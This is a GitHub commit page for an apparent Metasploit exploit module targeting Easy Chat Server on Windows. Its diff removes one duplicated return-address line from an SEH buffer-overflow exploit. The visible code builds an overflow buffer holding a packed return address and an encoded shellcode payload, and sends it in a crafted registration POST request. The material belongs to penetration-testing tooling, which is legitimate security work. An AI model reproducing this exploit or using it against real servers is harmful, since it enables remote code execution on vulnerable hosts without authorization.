Skip to content

Commit af4eb0f

Browse files
committed
Corrected shellcode
1 parent 0b04dc0 commit af4eb0f

File tree

1 file changed

+0
-1
lines changed

1 file changed

+0
-1
lines changed

modules/exploits/windows/http/easychatserver_seh.rb

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,6 @@ def exploit
5151
sploit << [target.ret].pack('V')
5252
sploit << payload.encoded
5353
sploit << rand_text_alpha_upper(200)
54-
sploit << [target.ret].pack('V')
5554

5655
request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
5756
connect

0 commit comments

Comments
 (0)